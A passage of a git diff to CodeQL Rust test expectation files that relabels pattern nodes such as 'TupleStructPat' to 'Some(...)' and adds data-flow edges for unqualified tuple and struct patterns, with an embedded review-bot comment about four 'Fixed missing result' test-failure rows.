main.rs:200:22:200:22 | n | +| main.rs:203:10:203:25 | C {...} | C | main.rs:203:23:203:23 | n | +| main.rs:203:29:203:44 | D {...} | D | main.rs:203:42:203:42 | n | +| main.rs:206:9:206:24 | C {...} | C | main.rs:206:22:206:22 | n | +| main.rs:207:9:207:24 | D {...} | D | main.rs:207:22:207:22 | n | diff --git a/rust/ql/test/library-tests/dataflow/local/inline-flow.expected b/rust/ql/test/library-tests/dataflow/local/inline-flow.expected index bfafa38c3ff..7ec1b3d8916 100644 --- a/rust/ql/test/library-tests/dataflow/local/inline-flow.expected +++ b/rust/ql/test/library-tests/dataflow/local/inline-flow.expected 
@@ -5,17 +5,24 @@ edges | main.rs:31:13:31:21 | source(...) | main.rs:36:10:36:10 | b | provenance | | | main.rs:45:15:45:23 | source(...) | main.rs:47:10:47:10 | b | provenance | | | main.rs:53:9:53:17 | source(...) | main.rs:54:10:54:10 | i | provenance | | -| main.rs:117:14:117:29 | Some(...) [Some] | main.rs:120:9:120:15 | TupleStructPat [Some] | provenance | | +| main.rs:117:14:117:29 | Some(...) [Some] | main.rs:120:9:120:15 | Some(...) [Some] | provenance | | | main.rs:117:19:117:28 | source(...) | main.rs:117:14:117:29 | Some(...) [Some] | provenance | | -| main.rs:120:9:120:15 | TupleStructPat [Some] | main.rs:120:14:120:14 | n | provenance | | +| main.rs:120:9:120:15 | Some(...) [Some] | main.rs:120:14:120:14 | n | provenance | | | main.rs:120:14:120:14 | n | main.rs:120:25:120:25 | n | provenance | | -| main.rs:135:14:135:39 | ...::A(...) [A] | main.rs:138:9:138:25 | TupleStructPat [A] | provenance | | -| main.rs:135:14:135:39 | ...::A(...) [A] | main.rs:142:10:142:26 | TupleStructPat [A] | provenance | | +| main.rs:135:14:135:39 | ...::A(...) [A] | main.rs:138:9:138:25 | ...::A(...) [A] | provenance | | +| main.rs:135:14:135:39 | ...::A(...) [A] | main.rs:142:10:142:26 | ...::A(...) [A] | provenance | | | main.rs:135:29:135:38 | source(...) | main.rs:135:14:135:39 | ...::A(...) [A] | provenance | | -| main.rs:138:9:138:25 | TupleStructPat [A] | main.rs:138:24:138:24 | n | provenance | | +| main.rs:138:9:138:25 | ...::A(...) [A] | main.rs:138:24:138:24 | n | provenance | | | main.rs:138:24:138:24 | n | main.rs:138:35:138:35 | n | provenance | | -| main.rs:142:10:142:26 | TupleStructPat [A] | main.rs:142:25:142:25 | n | provenance | | +| main.rs:142:10:142:26 | ...::A(...) [A] | main.rs:142:25:142:25 | n | provenance | | | main.rs:142:25:142:25 | n | main.rs:142:57:142:57 | n | provenance | | +| main.rs:153:14:153:26 | A(...) [A] | main.rs:156:9:156:12 | A(...) [A] | provenance | | +| main.rs:153:14:153:26 | A(...) [A] | main.rs:160:10:160:13 | A(...) 
[A] | provenance | | +| main.rs:153:16:153:25 | source(...) | main.rs:153:14:153:26 | A(...) [A] | provenance | | +| main.rs:156:9:156:12 | A(...) [A] | main.rs:156:11:156:11 | n | provenance | | +| main.rs:156:11:156:11 | n | main.rs:156:22:156:22 | n | provenance | | +| main.rs:160:10:160:13 | A(...) [A] | main.rs:160:12:160:12 | n | provenance | | +| main.rs:160:12:160:12 | n | main.rs:160:31:160:31 | n | provenance | | | main.rs:174:14:176:5 | ...::C {...} [C] | main.rs:179:9:179:38 | ...::C {...} [C] | provenance | | | main.rs:174:14:176:5 | ...::C {...} [C] | main.rs:183:10:183:39 | ...::C {...} [C] | provenance | | | main.rs:175:18:175:27 | source(...) | main.rs:174:14:176:5 | ...::C {...} [C] | provenance | | @@ -23,6 +30,13 @@ edges | main.rs:179:36:179:36 | n | main.rs:179:48:179:48 | n | provenance | | | main.rs:183:10:183:39 | ...::C {...} [C] | main.rs:183:37:183:37 | n | provenance | | | main.rs:183:37:183:37 | n | main.rs:183:83:183:83 | n | provenance | | +| main.rs:194:14:196:5 | C {...} [C] | main.rs:199:9:199:24 | C {...} [C] | provenance | | +| main.rs:194:14:196:5 | C {...} [C] | main.rs:203:10:203:25 | C {...} [C] | provenance | | +| main.rs:195:18:195:27 | source(...) | main.rs:194:14:196:5 | C {...} [C] | provenance | | +| main.rs:199:9:199:24 | C {...} [C] | main.rs:199:22:199:22 | n | provenance | | +| main.rs:199:22:199:22 | n | main.rs:199:34:199:34 | n | provenance | | +| main.rs:203:10:203:25 | C {...} [C] | main.rs:203:23:203:23 | n | provenance | | +| main.rs:203:23:203:23 | n | main.rs:203:55:203:55 | n | provenance | | nodes | main.rs:15:10:15:18 | source(...) | semmle.label | source(...) | | main.rs:19:13:19:21 | source(...) | semmle.label | source(...) | 
@@ -37,17 +51,25 @@ nodes | main.rs:54:10:54:10 | i | semmle.label | i | | main.rs:117:14:117:29 | Some(...) [Some] | semmle.label | Some(...) [Some] | | main.rs:117:19:117:28 | source(...) | semmle.label | source(...) | -| main.rs:120:9:120:15 | TupleStructPat [Some] | semmle.label | TupleStructPat [Some] | +| main.rs:120:9:120:15 | Some(...) [Some] | semmle.label | Some(...) [Some] | | main.rs:120:14:120:14 | n | semmle.label | n | | main.rs:120:25:120:25 | n | semmle.label | n | | main.rs:135:14:135:39 | ...::A(...) [A] | semmle.label | ...::A(...) [A] | | main.rs:135:29:135:38 | source(...) | semmle.label | source(...) | -| main.rs:138:9:138:25 | TupleStructPat [A] | semmle.label | TupleStructPat [A] | +| main.rs:138:9:138:25 | ...::A(...) [A] | semmle.label | ...::A(...) [A] | | main.rs:138:24:138:24 | n | semmle.label | n | | main.rs:138:35:138:35 | n | semmle.label | n | -| main.rs:142:10:142:26 | TupleStructPat [A] | semmle.label | TupleStructPat [A] | +| main.rs:142:10:142:26 | ...::A(...) [A] | semmle.label | ...::A(...) [A] | | main.rs:142:25:142:25 | n | semmle.label | n | | main.rs:142:57:142:57 | n | semmle.label | n | +| main.rs:153:14:153:26 | A(...) [A] | semmle.label | A(...) [A] | +| main.rs:153:16:153:25 | source(...) | semmle.label | source(...) | +| main.rs:156:9:156:12 | A(...) [A] | semmle.label | A(...) [A] | +| main.rs:156:11:156:11 | n | semmle.label | n | +| main.rs:156:22:156:22 | n | semmle.label | n | +| main.rs:160:10:160:13 | A(...) [A] | semmle.label | A(...) [A] | +| main.rs:160:12:160:12 | n | semmle.label | n | +| main.rs:160:31:160:31 | n | semmle.label | n | | main.rs:174:14:176:5 | ...::C {...} [C] | semmle.label | ...::C {...} [C] | | main.rs:175:18:175:27 | source(...) | semmle.label | source(...) | | main.rs:179:9:179:38 | ...::C {...} [C] | semmle.label | ...::C {...} [C] | 
@@ -56,8 +78,20 @@ nodes | main.rs:183:10:183:39 | ...::C {...} [C] | semmle.label | ...::C {...} [C] | | main.rs:183:37:183:37 | n | semmle.label | n | | main.rs:183:83:183:83 | n | semmle.label | n | +| main.rs:194:14:196:5 | C {...} [C] | semmle.label | C {...} [C] | +| main.rs:195:18:195:27 | source(...) | semmle.label | source(...) | +| main.rs:199:9:199:24 | C {...} [C] | semmle.label | C {...} [C] | +| main.rs:199:22:199:22 | n | semmle.label | n | +| main.rs:199:34:199:34 | n | semmle.label | n | +| main.rs:203:10:203:25 | C {...} [C] | semmle.label | C {...} [C] | +| main.rs:203:23:203:23 | n | semmle.label | n | +| main.rs:203:55:203:55 | n | semmle.label | n | subpaths testFailures +| main.rs:156:22:156:22 | n | Fixed missing result: hasValueFlow=16 | +| main.rs:160:31:160:31 | n | Fixed missing result: hasValueFlow=16 | +| main.rs:199:34:199:34 | n | Fixed missing result: hasValueFlow=18 | +| main.rs:203:55:203:55 | n | Fixed missing result: hasValueFlow=18 | #select | main.rs:15:10:15:18 | source(...) | main.rs:15:10:15:18 | source(...) | main.rs:15:10:15:18 | source(...) | $@ | main.rs:15:10:15:18 | source(...) | source(...) | | main.rs:20:10:20:10 | s | main.rs:19:13:19:21 | source(...) | main.rs:20:10:20:10 | s | $@ | main.rs:19:13:19:21 | source(...) | source(...) | 
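Review bot: The four rows added under `testFailures` (`Fixed missing result: hasValueFlow=16` at main.rs:156 and main.rs:160, `hasValueFlow=18` at main.rs:199 and main.rs:203) commit a known mismatch into the expected output instead of a clean pass. The message indicates the flow through the unqualified `A(...)` and `C {...}` patterns is now found while the inline annotations in main.rs presumably still mark it as missing; main.rs is not visible in this part of the patch, so this is inferred. I would change those four annotations from `// $ MISSING: hasValueFlow=16` (and `=18`) to `// $ hasValueFlow=16` (and `=18`) and regenerate this file so `testFailures` is empty. With a standing failure section in a data-flow test, a reviewer of later changes has to tell accepted failures from new ones by hand, which weakens the regression signal for this flow coverage.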
@@ -68,5 +102,9 @@ testFailures | main.rs:120:25:120:25 | n | main.rs:117:19:117:28 | source(...) | main.rs:120:25:120:25 | n | $@ | main.rs:117:19:117:28 | source(...) | source(...) | | main.rs:138:35:138:35 | n | main.rs:135:29:135:38 | source(...) | main.rs:138:35:138:35 | n | $@ | main.rs:135:29:135:38 | source(...) | source(...) | | main.rs:142:57:142:57 | n | main.rs:135:29:135:38 | source(...) | main.rs:142:57:142:57 | n | $@ | main.rs:135:29:135:38 | source(...) | source(...) | +| main.rs:156:22:156:22 | n | main.rs:153:16:153:25 | source(...) | main.rs:156:22:156:22 | n | $@ | main.rs:153:16:153:25 | source(...) | source(...) | +| main.rs:160:31:160:31 | n | main.rs:153:16:153:25 | source(...) | main.rs:160:31:160:31 | n | $@ | main.rs:153:16:153:25 | source(...) | source(...) | | main.rs:179:48:179:48 | n | main.rs:175:18:175:27 | source(...) | main.rs:179:48:179:48 | n | $@ | main.rs:175:18:175:27 | source(...) | source(...) | | main.rs:183:83:183:83 | n | main.rs:175:18:175:27 | source(...) | main.rs:183:83:183:83 | n | $@ | main.rs:175:18:175:27 | source(...) | source(...) | +| main.rs:199:34:199:34 | n | main.rs:195:18:195:27 | source(...) | main.rs:199:34:199:34 | n | $@ | main.rs:195:18:195:27 | source(...) | source(...) | +| main.rs:203:55:203:55 | n | main.rs:195:18:195:27 | source(...) | main.rs:203:55:203:55 | n | $@ | main.rs:195:18:195:27 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/variables/Cfg.expected b/rust/ql/test/library-tests/variables/Cfg.expected index 6b979eac0da..b55c0e9d04c 100644 --- a/rust/ql/test/library-tests/variables/Cfg.expected +++ b/rust/ql/test/library-tests/variables/Cfg.expected 
@@ -197,10 +197,10 @@ edges | variables.rs:85:32:85:39 | "Hello!" | variables.rs:85:19:85:40 | ...::from(...) | | | variables.rs:87:5:90:5 | if ... {...} | variables.rs:84:19:91:1 | { ... } | | | variables.rs:87:8:88:12 | let ... = s1 | variables.rs:88:11:88:12 | s1 | | -| variables.rs:87:12:87:23 | TupleStructPat | variables.rs:87:5:90:5 | if ... {...} | no-match | -| variables.rs:87:12:87:23 | TupleStructPat | variables.rs:87:17:87:22 | s2 | match | +| variables.rs:87:12:87:23 | Some(...) | variables.rs:87:5:90:5 | if ... {...} | no-match | +| variables.rs:87:12:87:23 | Some(...) | variables.rs:87:17:87:22 | s2 | match | | variables.rs:87:17:87:22 | s2 | variables.rs:89:9:89:22 | ExprStmt | match | -| variables.rs:88:11:88:12 | s1 | variables.rs:87:12:87:23 | TupleStructPat | | +| variables.rs:88:11:88:12 | s1 | variables.rs:87:12:87:23 | Some(...) | | | variables.rs:88:14:90:5 | { ... } | variables.rs:87:5:90:5 | if ... {...} | | | variables.rs:89:9:89:17 | print_str | variables.rs:89:19:89:20 | s2 | | | variables.rs:89:9:89:21 | print_str(...) | variables.rs:88:14:90:5 | { ... } | | 
@@ -210,11 +210,11 @@ edges | variables.rs:93:1:99:1 | exit fn let_pattern4 (normal) | variables.rs:93:1:99:1 | exit fn let_pattern4 | | | variables.rs:93:19:99:1 | { ... } | variables.rs:93:1:99:1 | exit fn let_pattern4 (normal) | | | variables.rs:94:5:97:10 | let ... = ... else {...} | variables.rs:94:34:94:37 | Some | | -| variables.rs:94:9:94:16 | TupleStructPat | variables.rs:94:14:94:15 | x5 | match | -| variables.rs:94:9:94:16 | TupleStructPat | variables.rs:96:13:96:19 | MacroStmts | no-match | +| variables.rs:94:9:94:16 | Some(...) | variables.rs:94:14:94:15 | x5 | match | +| variables.rs:94:9:94:16 | Some(...) | variables.rs:96:13:96:19 | MacroStmts | no-match | | variables.rs:94:14:94:15 | x5 | variables.rs:98:5:98:18 | ExprStmt | match | | variables.rs:94:34:94:37 | Some | variables.rs:94:39:94:42 | "x5" | | -| variables.rs:94:34:94:43 | Some(...) | variables.rs:94:9:94:16 | TupleStructPat | | +| variables.rs:94:34:94:43 | Some(...) | variables.rs:94:9:94:16 | Some(...) | | | variables.rs:94:39:94:42 | "x5" | variables.rs:94:34:94:43 | Some(...) | | | variables.rs:96:13:96:19 | "not yet implemented" | variables.rs:96:13:96:19 | ...::panic(...) | | | variables.rs:96:13:96:19 | ...::panic | variables.rs:96:13:96:19 | "not yet implemented" | | 
@@ -237,10 +237,10 @@ edges | variables.rs:102:32:102:39 | "Hello!" | variables.rs:102:19:102:40 | ...::from(...) | | | variables.rs:104:5:107:5 | while ... { ... } | variables.rs:101:19:108:1 | { ... } | | | variables.rs:104:11:105:12 | let ... = s1 | variables.rs:105:11:105:12 | s1 | | -| variables.rs:104:15:104:26 | TupleStructPat | variables.rs:104:5:107:5 | while ... { ... } | no-match | -| variables.rs:104:15:104:26 | TupleStructPat | variables.rs:104:20:104:25 | s2 | match | +| variables.rs:104:15:104:26 | Some(...) | variables.rs:104:5:107:5 | while ... { ... } | no-match | +| variables.rs:104:15:104:26 | Some(...) | variables.rs:104:20:104:25 | s2 | match | | variables.rs:104:20:104:25 | s2 | variables.rs:106:9:106:22 | ExprStmt | match | -| variables.rs:105:11:105:12 | s1 | variables.rs:104:15:104:26 | TupleStructPat | | +| variables.rs:105:11:105:12 | s1 | variables.rs:104:15:104:26 | Some(...) | | | variables.rs:105:14:107:5 | { ... } | variables.rs:104:11:105:12 | let ... = s1 | | | variables.rs:106:9:106:17 | print_str | variables.rs:106:19:106:20 | s2 | | | variables.rs:106:9:106:21 | print_str(...) | variables.rs:105:14:107:5 | { ... } | | 
@@ -259,17 +259,17 @@ edges | variables.rs:112:14:112:15 | 10 | variables.rs:112:9:112:10 | y1 | | | variables.rs:114:5:122:5 | ExprStmt | variables.rs:114:11:114:12 | x6 | | | variables.rs:114:5:122:5 | match x6 { ... } | variables.rs:124:5:124:18 | ExprStmt | | -| variables.rs:114:11:114:12 | x6 | variables.rs:115:9:115:16 | TupleStructPat | | -| variables.rs:115:9:115:16 | TupleStructPat | variables.rs:115:14:115:15 | 50 | match | -| variables.rs:115:9:115:16 | TupleStructPat | variables.rs:116:9:116:16 | TupleStructPat | no-match | +| variables.rs:114:11:114:12 | x6 | variables.rs:115:9:115:16 | Some(...) | | +| variables.rs:115:9:115:16 | Some(...) | variables.rs:115:14:115:15 | 50 | match | +| variables.rs:115:9:115:16 | Some(...) | variables.rs:116:9:116:16 | Some(...) | no-match | | variables.rs:115:14:115:15 | 50 | variables.rs:115:14:115:15 | 50 | | | variables.rs:115:14:115:15 | 50 | variables.rs:115:21:115:29 | print_str | match | -| variables.rs:115:14:115:15 | 50 | variables.rs:116:9:116:16 | TupleStructPat | no-match | +| variables.rs:115:14:115:15 | 50 | variables.rs:116:9:116:16 | Some(...) | no-match | | variables.rs:115:21:115:29 | print_str | variables.rs:115:31:115:38 | "Got 50" | | | variables.rs:115:21:115:39 | print_str(...) | variables.rs:114:5:122:5 | match x6 { ... } | | | variables.rs:115:31:115:38 | "Got 50" | variables.rs:115:21:115:39 | print_str(...) | | -| variables.rs:116:9:116:16 | TupleStructPat | variables.rs:116:14:116:15 | y1 | match | -| variables.rs:116:9:116:16 | TupleStructPat | variables.rs:121:9:121:12 | None | no-match | +| variables.rs:116:9:116:16 | Some(...) | variables.rs:116:14:116:15 | y1 | match | +| variables.rs:116:9:116:16 | Some(...) | variables.rs:121:9:121:12 | None | no-match | | variables.rs:116:14:116:15 | y1 | variables.rs:119:13:119:21 | print_i64 | match | | variables.rs:118:9:120:9 | { ... } | variables.rs:114:5:122:5 | match x6 { ... 
} | | | variables.rs:119:13:119:21 | print_i64 | variables.rs:119:23:119:24 | y1 | | @@ -404,12 +404,12 @@ edges | variables.rs:189:18:189:33 | ...::Left(...) | variables.rs:189:9:189:14 | either | | | variables.rs:189:31:189:32 | 32 | variables.rs:189:18:189:33 | ...::Left(...) | | | variables.rs:190:5:193:5 | match either { ... } | variables.rs:188:21:194:1 | { ... } | | -| variables.rs:190:11:190:16 | either | variables.rs:191:9:191:24 | TupleStructPat | | -| variables.rs:191:9:191:24 | TupleStructPat | variables.rs:191:22:191:23 | a3 | match | -| variables.rs:191:9:191:24 | TupleStructPat | variables.rs:191:28:191:44 | TupleStructPat | no-match | +| variables.rs:190:11:190:16 | either | variables.rs:191:9:191:24 | ...::Left(...) | | +| variables.rs:191:9:191:24 | ...::Left(...) | variables.rs:191:22:191:23 | a3 | match | +| variables.rs:191:9:191:24 | ...::Left(...) | variables.rs:191:28:191:44 | ...::Right(...) | no-match | | variables.rs:191:9:191:44 | [match(true)] ... \| ... | variables.rs:192:16:192:24 | print_i64 | match | | variables.rs:191:22:191:23 | a3 | variables.rs:191:9:191:44 | [match(true)] ... \| ... | match | -| variables.rs:191:28:191:44 | TupleStructPat | variables.rs:191:42:191:43 | a3 | match | +| variables.rs:191:28:191:44 | ...::Right(...) | variables.rs:191:42:191:43 | a3 | match | | variables.rs:191:42:191:43 | a3 | variables.rs:191:9:191:44 | [match(true)] ... \| ... | match | | variables.rs:192:16:192:24 | print_i64 | variables.rs:192:26:192:27 | a3 | | | variables.rs:192:16:192:28 | print_i64(...) | variables.rs:190:5:193:5 | match either { ... } | | 
@@ -424,47 +424,47 @@ edges | variables.rs:203:34:203:35 | 62 | variables.rs:203:14:203:36 | ...::Second(...) | | | variables.rs:204:5:207:5 | ExprStmt | variables.rs:204:11:204:12 | tv | | | variables.rs:204:5:207:5 | match tv { ... } | variables.rs:208:5:211:5 | ExprStmt | | -| variables.rs:204:11:204:12 | tv | variables.rs:205:9:205:30 | TupleStructPat | | -| variables.rs:205:9:205:30 | TupleStructPat | variables.rs:205:28:205:29 | a4 | match | -| variables.rs:205:9:205:30 | TupleStructPat | variables.rs:205:34:205:56 | TupleStructPat | no-match | +| variables.rs:204:11:204:12 | tv | variables.rs:205:9:205:30 | ...::First(...) | | +| variables.rs:205:9:205:30 | ...::First(...) | variables.rs:205:28:205:29 | a4 | match | +| variables.rs:205:9:205:30 | ...::First(...) | variables.rs:205:34:205:56 | ...::Second(...) | no-match | | variables.rs:205:9:205:81 | [match(true)] ... \| ... \| ... | variables.rs:206:16:206:24 | print_i64 | match | | variables.rs:205:28:205:29 | a4 | variables.rs:205:9:205:81 | [match(true)] ... \| ... \| ... | match | -| variables.rs:205:34:205:56 | TupleStructPat | variables.rs:205:54:205:55 | a4 | match | -| variables.rs:205:34:205:56 | TupleStructPat | variables.rs:205:60:205:81 | TupleStructPat | no-match | +| variables.rs:205:34:205:56 | ...::Second(...) | variables.rs:205:54:205:55 | a4 | match | +| variables.rs:205:34:205:56 | ...::Second(...) | variables.rs:205:60:205:81 | ...::Third(...) | no-match | | variables.rs:205:54:205:55 | a4 | variables.rs:205:9:205:81 | [match(true)] ... \| ... \| ... | match | -| variables.rs:205:60:205:81 | TupleStructPat | variables.rs:205:79:205:80 | a4 | match | +| variables.rs:205:60:205:81 | ...::Third(...) | variables.rs:205:79:205:80 | a4 | match | | variables.rs:205:79:205:80 | a4 | variables.rs:205:9:205:81 | [match(true)] ... \| ... \| ... | match | | variables.rs:206:16:206:24 | print_i64 | variables.rs:206:26:206:27 | a4 | | | variables.rs:206:16:206:28 | print_i64(...) 
| variables.rs:204:5:207:5 | match tv { ... } | | | variables.rs:206:26:206:27 | a4 | variables.rs:206:16:206:28 | print_i64(...) | | | variables.rs:208:5:211:5 | ExprStmt | variables.rs:208:11:208:12 | tv | | | variables.rs:208:5:211:5 | match tv { ... } | variables.rs:212:11:212:12 | tv | | -| variables.rs:208:11:208:12 | tv | variables.rs:209:10:209:31 | TupleStructPat | | +| variables.rs:208:11:208:12 | tv | variables.rs:209:10:209:31 | ...::First(...) | | | variables.rs:209:9:209:83 | [match(true)] ... \| ... | variables.rs:210:16:210:24 | print_i64 | match | -| variables.rs:209:10:209:31 | TupleStructPat | variables.rs:209:29:209:30 | a5 | match | -| variables.rs:209:10:209:31 | TupleStructPat | variables.rs:209:35:209:57 | TupleStructPat | no-match | -| variables.rs:209:10:209:57 | [match(false)] ... \| ... | variables.rs:209:62:209:83 | TupleStructPat | no-match | +| variables.rs:209:10:209:31 | ...::First(...) | variables.rs:209:29:209:30 | a5 | match | +| variables.rs:209:10:209:31 | ...::First(...) | variables.rs:209:35:209:57 | ...::Second(...) | no-match | +| variables.rs:209:10:209:57 | [match(false)] ... \| ... | variables.rs:209:62:209:83 | ...::Third(...) | no-match | | variables.rs:209:10:209:57 | [match(true)] ... \| ... | variables.rs:209:9:209:83 | [match(true)] ... \| ... | match | | variables.rs:209:29:209:30 | a5 | variables.rs:209:10:209:57 | [match(true)] ... \| ... | match | -| variables.rs:209:35:209:57 | TupleStructPat | variables.rs:209:10:209:57 | [match(false)] ... \| ... | no-match | -| variables.rs:209:35:209:57 | TupleStructPat | variables.rs:209:55:209:56 | a5 | match | +| variables.rs:209:35:209:57 | ...::Second(...) | variables.rs:209:10:209:57 | [match(false)] ... \| ... | no-match | +| variables.rs:209:35:209:57 | ...::Second(...) | variables.rs:209:55:209:56 | a5 | match | | variables.rs:209:55:209:56 | a5 | variables.rs:209:10:209:57 | [match(true)] ... \| ... 
| match | -| variables.rs:209:62:209:83 | TupleStructPat | variables.rs:209:81:209:82 | a5 | match | +| variables.rs:209:62:209:83 | ...::Third(...) | variables.rs:209:81:209:82 | a5 | match | | variables.rs:209:81:209:82 | a5 | variables.rs:209:9:209:83 | [match(true)] ... \| ... | match | | variables.rs:210:16:210:24 | print_i64 | variables.rs:210:26:210:27 | a5 | | | variables.rs:210:16:210:28 | print_i64(...) | variables.rs:208:5:211:5 | match tv { ... } | | | variables.rs:210:26:210:27 | a5 | variables.rs:210:16:210:28 | print_i64(...) | | | variables.rs:212:5:215:5 | match tv { ... } | variables.rs:202:21:216:1 | { ... } | | -| variables.rs:212:11:212:12 | tv | variables.rs:213:9:213:30 | TupleStructPat | | -| variables.rs:213:9:213:30 | TupleStructPat | variables.rs:213:28:213:29 | a6 | match | -| variables.rs:213:9:213:30 | TupleStructPat | variables.rs:213:35:213:57 | TupleStructPat | no-match | +| variables.rs:212:11:212:12 | tv | variables.rs:213:9:213:30 | ...::First(...) | | +| variables.rs:213:9:213:30 | ...::First(...) | variables.rs:213:28:213:29 | a6 | match | +| variables.rs:213:9:213:30 | ...::First(...) | variables.rs:213:35:213:57 | ...::Second(...) | no-match | | variables.rs:213:9:213:83 | [match(true)] ... \| ... | variables.rs:214:16:214:24 | print_i64 | match | | variables.rs:213:28:213:29 | a6 | variables.rs:213:9:213:83 | [match(true)] ... \| ... | match | -| variables.rs:213:35:213:57 | TupleStructPat | variables.rs:213:55:213:56 | a6 | match | -| variables.rs:213:35:213:57 | TupleStructPat | variables.rs:213:61:213:82 | TupleStructPat | no-match | +| variables.rs:213:35:213:57 | ...::Second(...) | variables.rs:213:55:213:56 | a6 | match | +| variables.rs:213:35:213:57 | ...::Second(...) | variables.rs:213:61:213:82 | ...::Third(...) | no-match | | variables.rs:213:35:213:82 | [match(true)] ... \| ... | variables.rs:213:9:213:83 | [match(true)] ... \| ... 
| match | | variables.rs:213:55:213:56 | a6 | variables.rs:213:35:213:82 | [match(true)] ... \| ... | match | -| variables.rs:213:61:213:82 | TupleStructPat | variables.rs:213:80:213:81 | a6 | match | +| variables.rs:213:61:213:82 | ...::Third(...) | variables.rs:213:80:213:81 | a6 | match | | variables.rs:213:80:213:81 | a6 | variables.rs:213:35:213:82 | [match(true)] ... \| ... | match | | variables.rs:214:16:214:24 | print_i64 | variables.rs:214:26:214:27 | a6 | | | variables.rs:214:16:214:28 | print_i64(...) | variables.rs:212:5:215:5 | match tv { ... } | | 
@@ -478,14 +478,14 @@ edges | variables.rs:219:18:219:33 | ...::Left(...) | variables.rs:219:9:219:14 | either | | | variables.rs:219:31:219:32 | 32 | variables.rs:219:18:219:33 | ...::Left(...) | | | variables.rs:220:5:225:5 | match either { ... } | variables.rs:218:21:226:1 | { ... } | | -| variables.rs:220:11:220:16 | either | variables.rs:221:9:221:24 | TupleStructPat | | -| variables.rs:221:9:221:24 | TupleStructPat | variables.rs:221:22:221:23 | a7 | match | -| variables.rs:221:9:221:24 | TupleStructPat | variables.rs:221:28:221:44 | TupleStructPat | no-match | +| variables.rs:220:11:220:16 | either | variables.rs:221:9:221:24 | ...::Left(...) | | +| variables.rs:221:9:221:24 | ...::Left(...) | variables.rs:221:22:221:23 | a7 | match | +| variables.rs:221:9:221:24 | ...::Left(...) | variables.rs:221:28:221:44 | ...::Right(...) | no-match | | variables.rs:221:9:221:44 | [match(false)] ... \| ... | variables.rs:224:9:224:9 | _ | no-match | | variables.rs:221:9:221:44 | [match(true)] ... \| ... | variables.rs:222:16:222:17 | a7 | match | | variables.rs:221:22:221:23 | a7 | variables.rs:221:9:221:44 | [match(true)] ... \| ... | match | -| variables.rs:221:28:221:44 | TupleStructPat | variables.rs:221:9:221:44 | [match(false)] ... \| ... | no-match | -| variables.rs:221:28:221:44 | TupleStructPat | variables.rs:221:42:221:43 | a7 | match | +| variables.rs:221:28:221:44 | ...::Right(...) | variables.rs:221:9:221:44 | [match(false)] ... \| ... | no-match | +| variables.rs:221:28:221:44 | ...::Right(...) | variables.rs:221:42:221:43 | a7 | match | | variables.rs:221:42:221:43 | a7 | variables.rs:221:9:221:44 | [match(true)] ... \| ... | match | | variables.rs:222:16:222:17 | a7 | variables.rs:222:21:222:21 | 0 | | | variables.rs:222:16:222:21 | ... > ... | variables.rs:223:16:223:24 | print_i64 | true | 
@@ -505,15 +505,15 @@ edges | variables.rs:229:18:229:33 | ...::Left(...) | variables.rs:229:9:229:14 | either | | | variables.rs:229:31:229:32 | 32 | variables.rs:229:18:229:33 | ...::Left(...) | | | variables.rs:231:5:242:5 | match either { ... } | variables.rs:228:21:243:1 | { ... } | | -| variables.rs:231:11:231:16 | either | variables.rs:233:14:233:30 | TupleStructPat | | +| variables.rs:231:11:231:16 | either | variables.rs:233:14:233:30 | ...::Left(...) | | | variables.rs:232:9:233:52 | [match(true)] e | variables.rs:235:13:235:27 | ExprStmt | match | -| variables.rs:233:14:233:30 | TupleStructPat | variables.rs:233:27:233:29 | a11 | match | -| variables.rs:233:14:233:30 | TupleStructPat | variables.rs:233:34:233:51 | TupleStructPat | no-match | +| variables.rs:233:14:233:30 | ...::Left(...) | variables.rs:233:27:233:29 | a11 | match | +| variables.rs:233:14:233:30 | ...::Left(...) | variables.rs:233:34:233:51 | ...::Right(...) | no-match | | variables.rs:233:14:233:51 | [match(false)] ... \| ... | variables.rs:241:9:241:9 | _ | no-match | | variables.rs:233:14:233:51 | [match(true)] ... \| ... | variables.rs:232:9:233:52 | [match(true)] e | match | | variables.rs:233:27:233:29 | a11 | variables.rs:233:14:233:51 | [match(true)] ... \| ... | match | -| variables.rs:233:34:233:51 | TupleStructPat | variables.rs:233:14:233:51 | [match(false)] ... \| ... | no-match | -| variables.rs:233:34:233:51 | TupleStructPat | variables.rs:233:48:233:50 | a11 | match | +| variables.rs:233:34:233:51 | ...::Right(...) | variables.rs:233:14:233:51 | [match(false)] ... \| ... | no-match | +| variables.rs:233:34:233:51 | ...::Right(...) | variables.rs:233:48:233:50 | a11 | match | | variables.rs:233:48:233:50 | a11 | variables.rs:233:14:233:51 | [match(true)] ... \| ... | match | | variables.rs:234:12:240:9 | { ... } | variables.rs:231:5:242:5 | match either { ... } | | | variables.rs:235:13:235:21 | print_i64 | variables.rs:235:23:235:25 | a11 | | 
@@ -522,10 +522,10 @@ edges | variables.rs:235:23:235:25 | a11 | variables.rs:235:13:235:26 | print_i64(...) | | | variables.rs:236:13:239:13 | if ... {...} | variables.rs:234:12:240:9 | { ... } | | | variables.rs:236:16:237:15 | let ... = e | variables.rs:237:15:237:15 | e | | -| variables.rs:236:20:236:36 | TupleStructPat | variables.rs:236:13:239:13 | if ... {...} | no-match | -| variables.rs:236:20:236:36 | TupleStructPat | variables.rs:236:33:236:35 | a12 | match | +| variables.rs:236:20:236:36 | ...::Left(...) | variables.rs:236:13:239:13 | if ... {...} | no-match | +| variables.rs:236:20:236:36 | ...::Left(...) | variables.rs:236:33:236:35 | a12 | match | | variables.rs:236:33:236:35 | a12 | variables.rs:238:17:238:32 | ExprStmt | match | -| variables.rs:237:15:237:15 | e | variables.rs:236:20:236:36 | TupleStructPat | | +| variables.rs:237:15:237:15 | e | variables.rs:236:20:236:36 | ...::Left(...) | | | variables.rs:237:17:239:13 | { ... } | variables.rs:236:13:239:13 | if ... {...} | | | variables.rs:238:17:238:25 | print_i64 | variables.rs:238:28:238:30 | a12 | | | variables.rs:238:17:238:31 | print_i64(...) | variables.rs:237:17:239:13 | { ... } | | 
